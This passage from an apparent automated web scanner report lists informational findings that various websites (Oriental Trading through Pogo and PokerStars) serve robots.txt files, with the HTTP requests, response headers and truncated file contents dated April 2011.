24.628. http://www.orientaltrading.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.orientaltrading.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.orientaltrading.com

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Thu, 03 Sep 2009 23:16:52 GMT
Accept-Ranges: bytes
Content-Length: 354
Content-Type: text/plain
Date: Sat, 02 Apr 2011 13:42:02 GMT
Connection: close

# robots.txt for http://www.orientaltrading.com/sitemap.xml

User-agent: *


#affiliates directory
Disallow: /application
Disallow: /aff/
Disallow: /business_edition/
Disallow: /carnival/
Disallow
...[SNIP]...

24.629. http://www.ourstage.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ourstage.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.ourstage.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:33:47 GMT
Server: haproxy
Last-Modified: Thu, 12 Aug 2010 18:21:59 GMT
ETag: "10273-181-48da471213fc0"
Accept-Ranges: bytes
Content-Length: 385
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain; charset=UTF-8

User-agent: *
Disallow: /tracker/
Disallow: /live/
Disallow: /embed/
Disallow: /gmap/
Disallow: /short_n_tweet/
Disallow: /tracks/TRACK_KEY
Disallow: /tracks/TRACK_KEY/
Disallow: /profile/ARTIST_KEY
D
...[SNIP]...

24.630. http://www.overstock.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.overstock.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.overstock.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:23:29 GMT
Server: Apache
Last-Modified: Wed, 29 Jul 2009 05:52:26 GMT
Accept-Ranges: bytes
Content-Length: 1033
Keep-Alive: timeout=5, max=96
Connection: Keep-Alive
Content-Type: text/plain

User-Agent: *
Disallow: /sm-*
Disallow: /cart
Disallow: /checkout
Disallow: https://www.overstock.com/cgi-bin/d2.cgi?PAGE=MYACCOUNT
Disallow: https://www.overstock.com/cgi-bin/d2.
...[SNIP]...

24.631. http://www.ovguide.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ovguide.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.ovguide.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:32:52 GMT
Server: Apache/2.2.3 (CentOS)
Vary: Accept-Encoding,User-Agent
Content-Length: 129
Keep-Alive: timeout=3, max=500
Connection: Keep-Alive
Content-Type: text/plain; charset=UTF-8

User-agent: *
Disallow: /search/
Disallow: /landing/iframe_landing_ad.php

Sitemap: http://sitemap.ovguide.com/sitemap_index.xml

24.632. http://www.parenting.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.parenting.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.parenting.com

Response

HTTP/1.1 200 OK
Server: Apache
Last-Modified: Thu, 06 Jan 2011 23:16:26 GMT
Vary: Accept-Encoding,User-Agent
X-Server-Name: web4d D=1720
Content-Type: text/plain
Content-Language: en
cache-control: max-age = 3600
Content-Length: 2920
Date: Sat, 02 Apr 2011 14:12:43 GMT
X-Varnish: 2020012568 2019994151
Via: 1.1 varnish
Connection: close
age: 0
X-Cache: webcache12: HIT 2

### BEGIN FILE - Parenting (December 2010)###
#
# The use of robots or other automated means to access any Bonnier Corporation website
# without the express permission of Bonnier Corporation is st
...[SNIP]...

24.633. http://www.parentsconnect.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.parentsconnect.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.parentsconnect.com

Response

HTTP/1.0 200 OK
Server: Apache/2.0.63 (Unix) mod_jk/1.2.27
Last-Modified: Fri, 11 Mar 2011 22:14:57 GMT
ETag: "2e3fef9-48-49e3c4accba40"
Accept-Ranges: bytes
Content-Length: 72
Content-Type: text/plain
Cache-Control: max-age=600
Date: Sat, 02 Apr 2011 13:36:39 GMT
Connection: close

User-agent: *
Disallow: /common/error/
Disallow: /errors/
Disallow: /me/

24.634. http://www.partstore.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.partstore.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.partstore.com

Response

HTTP/1.1 200 OK
Content-Length: 897
Content-Type: text/plain
Last-Modified: Thu, 30 Sep 2010 18:41:54 GMT
Accept-Ranges: bytes
ETag: "045f27cf60cb1:8a4b"
X-Powered-By: ASP.NET
Date: Sat, 02 Apr 2011 14:19:39 GMT
Connection: close

User-Agent: OmniExplorer_Bot
Disallow: /

User-agent: *
Disallow: /Utility/
Disallow: /GetBasket.aspx
Disallow: /ChangePassword.aspx
Disallow: /CVNHelp.aspx
Disallow: /EasyReturns.aspx
Disall
...[SNIP]...

24.635. http://www.partypoker.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.partypoker.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.partypoker.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:34:18 GMT
Server: Apache
Set-Cookie: PPID=10.201.4.7.1301751258127882; path=/; expires=Tue, 30-Mar-21 13:34:18 GMT; domain=.partypoker.com
Last-Modified: Tue, 02 Feb 2010 12:19:01 GMT
Accept-Ranges: bytes
Content-Length: 435
Cache-Control: max-age=0
Expires: Sat, 02 Apr 2011 13:34:18 GMT
pics-label: (pics-1.1 "http://www.icra.org/ratingsv02.html" l gen true for "http://www.partypoker.com" r (nz 1 vz 1 lz 1 od 1 cz 1) gen true for "http://tracker.partypoker.com" r (nz 1 vz 1 lz 1 od 1 cz 1))
Keep-Alive: timeout=5, max=96
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /affiliates/
Disallow: /common/
Disallow: /includes/
Disallow: /js/
Disallow: /js/http:/
Disallow: /scripts/
Disallow: /styles/
Disallow: /cgi-bin/
Disallow: /beta/
Disallow: /
...[SNIP]...

24.636. http://www.payless.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.payless.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.payless.com

Response

HTTP/1.0 200 OK
Server:
Last-Modified: Fri, 28 Jan 2011 18:40:12 GMT
ETag: "e8-49aec65757b00"
Content-Type: text/plain; charset=UTF-8
Date: Sat, 02 Apr 2011 13:45:48 GMT
Content-Length: 232
Connection: close

User-agent: *

Disallow: /store/user/login.jsp?redirectURL=/store/home/home.jsp
Disallow: /store/home/privacy.jsp
Disallow: /store/home/terms.jsp
Disallow: /store/account/
Disallow: /store/check
...[SNIP]...

24.637. http://www.paypal.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.paypal.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.paypal.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 12:37:42 GMT
Server: Apache
Last-Modified: Wed, 31 Mar 2010 21:55:38 GMT
Accept-Ranges: bytes
Content-Length: 374
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain

### BEGIN FILE ###

# PayPal robots.txt file

User-agent: *
Disallow: /xclick-auction/
Disallow: /affil/
Disallow: /*?cmd=_flow
Disallow: /*?SESSION
Disallow: /*?cmd=_s-xclick
Disallow: /subscription
...[SNIP]...

24.638. http://www.pbs.org/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.pbs.org
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.pbs.org

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:35:30 GMT
Server: Apache/2.2.17 (Unix)
Set-Cookie: www.apache.sid=85e38394389d49ca7ba16cda6553887c; path=/; domain=.pbs.org
Last-Modified: Thu, 31 Mar 2011 13:35:07 GMT
ETag: "9b7928-847-49fc75c8e98c0"
Accept-Ranges: bytes
Content-Length: 2119
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /cgi-bin/*
Disallow: /cgi-registry/*
Disallow: /survey/
Disallow: /whatson/stations/
Disallow: /whatson/schedulex/
Disallow: /whatson/pbsyou/
Disallow: /whatson/dbs/
Disallow:
...[SNIP]...

24.639. http://www.pchlotto.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.pchlotto.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.pchlotto.com

Response

HTTP/1.0 200 OK
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Mon, 28 Feb 2011 21:01:27 GMT
ETag: "ab4b8c-158-49d5dfbb057c0"
Accept-Ranges: bytes
Content-Length: 344
Content-Type: text/plain; charset=UTF-8
Date: Sat, 02 Apr 2011 14:05:18 GMT
Connection: close

User-agent: *
Disallow: /administrator/
Disallow: /cache/
Disallow: /components/
Disallow: /images/
Disallow: /includes/
Disallow: /installation/
Disallow: /language/
Disallow: /libraries/
Disallow: /
...[SNIP]...

24.640. http://www.pcmag.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.pcmag.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.pcmag.com

Response

HTTP/1.0 200 OK
Content-Length: 438
Content-Type: text/plain
Last-Modified: Tue, 30 Nov 2010 20:01:03 GMT
Accept-Ranges: bytes
ETag: "6f123051c990cb1:46c"
Server: Microsoft-IIS/6.0
X-Powered-By: p3
Expires: Sat, 02 Apr 2011 13:54:04 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 02 Apr 2011 13:54:04 GMT
Connection: close

User-agent: *
Disallow: /products
Disallow: /products/
Disallow: /search_redirect
Disallow: /search_redirect/
Disallow: /search_results
Disallow: /search_results/
Disallow: /search
Disallow: /
...[SNIP]...

24.641. http://www.pctools.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.pctools.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.pctools.com

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Wed, 08 Sep 2010 02:40:32 GMT
ETag: "73e3bc-70-48fb66ff52800"
Content-Type: text/plain; charset=UTF-8
X-Cache-Lookup: HIT from www3.pctools.com:8080
Date: Sat, 02 Apr 2011 13:43:49 GMT
Content-Length: 112
Connection: close

User-agent: *

Disallow: /myaccount/
Disallow: /info/

Sitemap: http://www.pctools.com/sitemaps/sitemapindex.xml

24.642. http://www.pcworld.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.pcworld.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.pcworld.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Accept-Ranges: bytes
ETag: W/"1470-1297458026000"
Last-Modified: Fri, 11 Feb 2011 21:00:26 GMT
Content-Type: text/plain
Vary: Accept-Encoding
Connection: close
Date: Sat, 02 Apr 2011 14:10:23 GMT
Age: 484
Content-Length: 1470

Sitemap: http://static.pcworld.com/sitemap/sitemap_index.xml
Sitemap: http://www.pcworld.com/googlenewssitemap.xml

User-agent: Googlebot
Disallow: /emailfriend
Disallow: /printable
Disallow: /r
...[SNIP]...

24.643. http://www.people.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.people.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.people.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 12:43:25 GMT
Server: Apache
Last-Modified: Mon, 25 Feb 2008 23:16:18 GMT
ETag: "18a-c25a1480"
Accept-Ranges: bytes
Content-Length: 394
Content-Type: text/plain; charset=utf-8
Vary: Accept-Encoding,X-Catmap-Header
P3P: CP='PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA PRE CUR ADMa DEVa TAIo PSAo PSDo IVAo IVDo CONo TELo OTPi OUR UNRo PUBi OTRo IND DSP CAO COR', CP='PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA PRE CUR ADMa DEVa TAIo PSAo PSDo IVAo IVDo CONo TELo OTPi OUR UNRo PUBi OTRo IND DSP CAO COR'
Connection: close

# Welcome to Pathfinder's robots.txt
#
# If you have any questions about indexing our site,
# especially regarding more efficient or convenient
# methods, please write to:
#
#
...[SNIP]...

24.644. http://www.peoplefinders.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.peoplefinders.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.peoplefinders.com

Response

HTTP/1.1 200 OK
Content-Type: text/plain
Last-Modified: Tue, 12 Oct 2010 14:51:55 GMT
Accept-Ranges: bytes
ETag: "80f72b31d6acb1:0"
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Sat, 02 Apr 2011 13:26:31 GMT
Connection: close
Content-Length: 205

Sitemap: http://www.peoplefinders.com/sitemap.xml

User-agent: *
Disallow: /bin/
Disallow: /App_Code/
Disallow: /App_Data/
Disallow: /controls/
Disallow: /Controllers/
Disallow: /Models/
Disallow: /Vi
...[SNIP]...

24.645. http://www.peopleofwalmart.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.peopleofwalmart.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.peopleofwalmart.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:51:20 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Thu, 22 Oct 2009 04:39:09 GMT
ETag: "b0183-23-4767ead1a9540"
Accept-Ranges: bytes
Content-Length: 35
Connection: close
Content-Type: text/plain; charset=UTF-8

User-agent: *
Disallow: /wp-admin/

24.646. http://www.peoplestylewatch.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.peoplestylewatch.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.peoplestylewatch.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:56:32 GMT
Server: Apache
Last-Modified: Wed, 08 Dec 2010 22:07:40 GMT
ETag: "381-5982c300"
Accept-Ranges: bytes
Content-Length: 897
Content-Type: text/plain; charset=utf-8
Vary: Accept-Encoding,X-Catmap-Header
P3P: CP='PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA PRE CUR ADMa DEVa TAIo PSAo PSDo IVAo IVDo CONo TELo OTPi OUR UNRo PUBi OTRo IND DSP CAO COR'
Connection: close

# Welcome to Pathfinder's robots.txt
#
# If you have any questions about indexing our site,
# especially regarding more efficient or convenient
# methods, please write to:
#
#
...[SNIP]...

24.647. http://www.petco.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.petco.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.petco.com

Response

HTTP/1.1 200 OK
ETag: "bc6b7cbbb135cb1:926"
P3P: CP="ALL DSP COR IVDi PSD PSA TELi TAIi ADM CUR CONi SAMi OUR IND PHY ONL UNI PUR COM NAV INT CNT PRE"
Accept-Ranges: bytes
Content-Length: 267
Date: Sat, 02 Apr 2011 13:29:40 GMT
Connection: close
Last-Modified: Fri, 06 Aug 2010 21:52:58 GMT
X-Strangeloop: RCache
X-SL-RCache: Cached
Content-Type: text/plain

# Spider instructions for all web servers in the production pool
# Thu, 11 Dec 2008 06:18:00 -0400


# Exclude Files From All Robots:

User-agent: *
Disallow: /secure/
Disallow: /cart/
Disa
...[SNIP]...

24.648. http://www.petfinder.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.petfinder.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.petfinder.com

Response

HTTP/1.0 200 OK
Server: Apache/2.2.4 (Unix) mod_apreq2-20051231/2.6.0 mod_perl/2.0.3 Perl/v5.8.5
Last-Modified: Mon, 20 Sep 2010 18:45:15 GMT
Accept-Ranges: bytes
Content-Length: 229
Content-Type: text/plain
Date: Sat, 02 Apr 2011 13:38:21 GMT
Connection: close

Sitemap: http://www.petfinder.com/sitemapindex.xml

User-agent: *
Disallow: /cgi/
Disallow: /search/
Disallow: /shelterSearch/
Disallow: /pet-search

User-agent: Slurp
Crawl-delay: 2

User-agent: Medi
...[SNIP]...

24.649. http://www.petside.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.petside.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.petside.com

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Mon, 14 Mar 2011 22:09:27 GMT
ETag: "b61081-ab1-49e7890a773c0"
Content-Type: text/plain
Cache-Control: max-age=60
Expires: Sat, 02 Apr 2011 13:44:41 GMT
Date: Sat, 02 Apr 2011 13:43:41 GMT
Content-Length: 2737
Connection: close

User-agent: *
Allow: /
Disallow: /Petside/
Disallow: /petside/
Disallow: /petsideblog/cats/
Disallow: /petsideblog/dogs/
Disallow: /petsideblog/petside_items/
Disallow: /petsideblog/cuddle_champion/
D
...[SNIP]...

24.650. http://www.petsmart.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.petsmart.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.petsmart.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:50:32 GMT
Server: Apache/2.0.63 (Unix)
Last-Modified: Fri, 14 Aug 2009 08:45:06 GMT
ETag: "53c0d0-15b-4711611a3a880"
Accept-Ranges: bytes
Content-Length: 347
Cache-Control: max-age=172800
Expires: Mon, 04 Apr 2011 13:50:32 GMT
Vary: Accept-Encoding
X-UA-Compatible: IE=EmulateIE7
Connection: close
Content-Type: text/plain; charset=ISO-8859-1

User-agent: *
Disallow: /search/
Disallow: /cart/
Disallow: /coreg/
Disallow: /checkout/
Disallow: /compare/
Disallow: /history/
Disallow: /include/
Disallow: /pop_ups/
Disallow: /cgi-bin/
Disallow: /
...[SNIP]...

24.651. http://www.pga.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.pga.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.pga.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:51:45 GMT
Server: Apache
Accept-Ranges: bytes
Content-Length: 3225
Content-Type: text/plain
Cache-Control: max-age=120
Expires: Sat, 02 Apr 2011 13:53:45 GMT
Connection: close

# $Id: robots.txt,v 1.9.2.1 2008/12/10 20:12:19 goba Exp $
#
# robots.txt
#
# This file is to prevent the crawling and indexing of certain parts
# of your site by web crawlers and spiders run by sites
...[SNIP]...

24.652. http://www.pgatour.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.pgatour.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.pgatour.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:26:41 GMT
Server: Apache
Accept-Ranges: bytes
Content-Length: 142
Content-Type: text/plain
Connection: close

User-Agent: *
Disallow: /.dev
Disallow: /.element
Disallow: /microsites
Disallow: /live-video/demo
Disallow: /pgatour_adspaces
Disallow: /tmp

24.653. http://www.philly.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.philly.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.philly.com

Response

HTTP/1.0 200 OK
Accept-Ranges: bytes
Cache-Control: max-age=3600
Content-Type: text/plain;charset=utf-8
Date: Sat, 02 Apr 2011 13:36:16 GMT
Expires: Sat, 02 Apr 2011 14:36:16 GMT
Last-Modified: Mon, 28 Mar 2011 04:22:38 GMT
Server: ECS (dca/5339)
Via: 1.0 sj-c14-r1-u12:3128 (squid)
X-Cache: HIT
X-Server-Name: sj-c14-r1-u20
Content-Length: 124
Connection: close

User-agent: *
Sitemap: http://www.philly.com/sitemap.xml
Disallow: /philly/search/
Disallow: /s/
Disallow: /templates/

24.654. http://www.phoenix.edu/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.phoenix.edu
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.phoenix.edu

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:43:57 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Thu, 31 Mar 2011 21:50:16 GMT
ETag: "11f4-4759f600"
Accept-Ranges: bytes
Content-Length: 4596
Connection: close
Content-Type: text/plain; charset=UTF-8
Vary: Accept-Encoding

###
# robots.txt file created on 02/06/2007
# For domain: http://phoenix.edu
###

User-agent: *
Disallow: /info/
Disallow: /properties/
Disallow: /references/
Disallow: /app_data/
Disallow:
...[SNIP]...

24.655. http://www.pickyourown.org/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.pickyourown.org
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.pickyourown.org

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 14:04:12 GMT
Server: Apache/1.3.42 (Unix) mod_log_bytes/1.2 mod_bwlimited/1.4 mod_auth_passthrough/1.8 FrontPage/5.0.2.2635 mod_ssl/2.8.31 OpenSSL/0.9.8e-fips-rhel5
Last-Modified: Sat, 24 Nov 2007 15:48:37 GMT
ETag: "6e05b2-1e-474847d5"
Accept-Ranges: bytes
Content-Length: 30
Connection: close
Content-Type: text/plain

User-Agent: *
Disallow: /pdfs/

24.656. http://www.picnik.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.picnik.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.picnik.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:30:34 GMT
Server: Apache/2.2.4
Last-Modified: Tue, 01 Feb 2011 19:40:37 GMT
ETag: "2f-b4e41740"
Accept-Ranges: bytes
Content-Length: 47
P3P: CP="NOI DSP COR CUR ADM DEV OUR BUS UNI"
X-Picnik-Info: h=w72.sea.picnik.com t=1301751034631409 D=143
Connection: close
Content-Type: text/plain; charset=UTF-8

User-agent: *
Disallow: /auth/picnik/loginguest

24.657. http://www.picsearch.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.picsearch.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.picsearch.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 14:19:04 GMT
Server: Apache/2.2.14 (Ubuntu) PHP/5.3.2-1ubuntu4.7 with Suhosin-Patch mod_perl/2.0.4 Perl/v5.10.1
Last-Modified: Fri, 22 Oct 2010 10:47:55 GMT
ETag: "20147ad1-d3-493325ffe6cc0"
Accept-Ranges: bytes
Content-Length: 211
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain

User-agent: Mediapartners-Google*
Disallow:

User-agent: Browsershots
Disallow:

User-agent: *
Disallow: /index.cgi
Disallow: /imageDetail.cgi
Disallow: /textSearch.cgi
Disallow: /search.cgi
Disallow:
...[SNIP]...

24.658. http://www.pillsbury.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.pillsbury.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.pillsbury.com

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Last-Modified: Sun, 29 Aug 2010 04:14:12 GMT
Accept-Ranges: bytes
ETag: "5556fca23047cb1:0"
Server: Microsoft-IIS/7.0
Content-Length: 382
Date: Sat, 02 Apr 2011 14:13:52 GMT
Connection: close

...# robots.txt for http://www.pillsbury.com

User-agent: *
Disallow: /Register
Disallow: /AALL
Disallow: /loginpop
Disallow: /login
Disallow: /Terms-Of-Use
Disallow: /Community-Agreement
Dis
...[SNIP]...

24.659. http://www.pipl.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.pipl.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.pipl.com

Response

HTTP/1.1 200 OK
Content-Length: 361
Content-Type: text/plain
Last-Modified: Tue, 20 Apr 2010 22:58:08 GMT
Accept-Ranges: bytes
ETag: "bcd3daf1dce0ca1:1d1d"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sat, 02 Apr 2011 13:42:37 GMT
Connection: close

User-agent: *
Disallow: /autocomplete/
Disallow: /bsearch/
Disallow: /cache/
Disallow: /errors/
Disallow: /highlight/
Disallow: /opensearch/
Disallow: /results/
Disallow: /rd/
Disallow: /sear
...[SNIP]...

24.660. http://www.pittsburghlive.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.pittsburghlive.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.pittsburghlive.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 14:10:01 GMT
Server: Apache/2.2.3 (Red Hat) PHP/5.1.6
Last-Modified: Fri, 24 Sep 2010 19:38:56 GMT
Accept-Ranges: bytes
Content-Length: 566
Vary: Accept-Encoding,User-agent
Connection: close
Content-Type: text/plain

User-agent: yahoo-newscrawler # Yahoo news
User-Agent: YahooSeeker # Yahoo
User-Agent: ArchitextSpider # Excite
User-Agent: Ask Jeeves
User-Agent: FAST-WebCrawler
User-Agent: Googlebot
User-Agent: M
...[SNIP]...

24.661. http://www.playdom.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.playdom.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.playdom.com

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sat, 02 Apr 2011 13:41:54 GMT
Content-Type: text/plain
Content-Length: 297
Last-Modified: Fri, 01 Apr 2011 23:30:22 GMT
Connection: close
Expires: Sun, 03 Apr 2011 13:41:54 GMT
Cache-Control: max-age=86400
Accept-Ranges: bytes

User-agent: *
Disallow: /css/
Disallow: /files/
Disallow: /flash/
Disallow: /images/
Disallow: /js/
Disallow: /php/
Disallow: /system/
Disallow: /user_guide/
Disallow: /xml/carousel.xml
Disallow: /xml
...[SNIP]...

24.662. http://www.playfin.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.playfin.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.playfin.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 14:06:52 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Thu, 17 Feb 2011 23:46:03 GMT
ETag: "1cf1119-45-49c83001704c0"
Accept-Ranges: bytes
Content-Length: 69
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain; charset=UTF-8

# By default, this robots.txt allows all bots
User-agent: *
Disallow:

24.663. http://www.pnc.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.pnc.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.pnc.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:37:18 GMT
Last-Modified: Fri, 25 Mar 2011 14:14:15 GMT
ETag: "318632-44-3575fbc0"
Accept-Ranges: bytes
Content-Length: 68
Keep-Alive: timeout=60, max=100
Connection: Keep-Alive
Content-Type: text/plain
Set-Cookie: NSC_q*epuew-w0-mc*80=ffffffffa9c1270145525d5f4f58455e445a4a422973;path=/

User-agent:*Disallow: /error/User-agent: ia_archiverDisallow: /

24.664. http://www.pogo.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.pogo.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.pogo.com

Response

HTTP/1.1 200 OK
Expires: 0
Cache-Control: max-age=0, private
Set-Cookie: prod.JID=BEC7E41A025276592CB3F36D1A2105D2.000016; Domain=.pogo.com; Path=/
Content-Language: en-US
Content-Type: text/plain;charset=ISO-8859-1
Content-Length: 416
Date: Sat, 02 Apr 2011 13:24:41 GMT
Server: Apache-Coyote/1.1
Connection: Keep-Alive


User-agent: *

Disallow: /account/
Disallow: /action/
Disallow: /avatar/
Disallow: /challenge/
Disallow: /error/
Disallow: /favorites/
Disallow: /friends.do
Disallow: /game/help.do
Disallow: /game/
...[SNIP]...

24.665. http://www.pokerstars.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.pokerstars.com
